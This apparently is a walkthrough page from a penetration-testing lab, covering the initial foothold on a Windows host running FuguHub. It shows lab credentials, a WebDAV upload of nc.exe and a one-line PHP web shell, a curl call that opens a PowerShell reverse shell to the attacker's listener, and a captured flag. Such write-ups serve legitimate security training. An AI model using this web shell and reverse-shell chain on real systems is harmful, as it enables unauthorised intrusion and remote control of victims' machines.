Foothold

adot:Pwned123!

GitHub - overgrowncarrot1/CVE-2023-24078: CVE-2023-24078 for FuguHub / BarracudaDriveGitHub

Inspiration with cadaver

❯ cadaver
dav:!> open http://192.168.160.127:8000/fs/88dbf60667052595/
dav:/fs/88dbf60667052595/> cd ..
Authentication required for Web File Server on server `192.168.160.127':
Username: adot
Password:
dav:/fs/> ls
Listing collection `/fs/': succeeded.
Coll:   C                                      0  Dec 31  1969
Coll:   D                                      0  Dec 31  1969
dav:/fs/> cd C
dav:/fs/C/> ls
Listing collection `/fs/C/': succeeded.
Coll:   $Recycle.Bin                           0  Nov  3  2020
Coll:   $WinREAgent                            0  Dec  2  2021
Coll:   Documents and Settings                 0  Oct 16  2020
Coll:   FTP                                    0  Nov  3  2020
Coll:   PerfLogs                               0  Dec  7  2019
Coll:   Program Files (x86)                    0  Dec  2  2021
Coll:   Program Files                          0  Dec  2  2021
Coll:   ProgramData                            0  Dec  7  2021
Coll:   RailsInstaller                         0  Nov  3  2020
Coll:   Recovery                               0  Dec  2  2021
Coll:   Ruby26-x64                             0  Nov  3  2020
Coll:   Sites                                  0  Nov  3  2020
Coll:   System Volume Information              0  Oct 16  2020
Coll:   Users                                  0  Dec  2  2021
Coll:   Windows                                0  Apr  8  2022
Coll:   bd                                     0  Oct  8 07:29
Coll:   xampp                                  0  Oct 16  2020
        DumpStack.log.tmp                   8192  Aug  2 15:29
        output.txt                          2696  Oct  8 07:16
        pagefile.sys                   738197504  Aug  2 15:29
        swapfile.sys                   268435456  Aug  2 15:29
dav:/fs/C/>

❯ echo test > test.txt

❯ echo "<?php echo shell_exec(\$_GET['cmd']); ?>" > cmd.php

dav:/fs/C/xampp/htdocs/> put nc.exe
Uploading nc.exe to `/fs/C/xampp/htdocs/nc.exe':
Progress: [=============================>] 100.0% of 59392 bytes succeeded.

❯ curl http://192.168.160.127:45332/cmd.php\?cmd\=nc.exe+192.168.45.239+8000+-e+powershell.exe

❯ nc -lnvp 8000
listening on [any] 8000 ...
connect to [192.168.45.239] from (UNKNOWN) [192.168.160.127] 50608
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\xampp\htdocs> whoami ; type C:\Users\Jerren\Desktop\local.txt ; ipconfig
whoami ; type C:\Users\Jerren\Desktop\local.txt ; ipconfig
medjed\jerren
e51dcad7ed48861988c2bd2337cdc9c3

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 192.168.160.127
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.160.254

Previous30021 NextPriv Esc

Last updated 8 months ago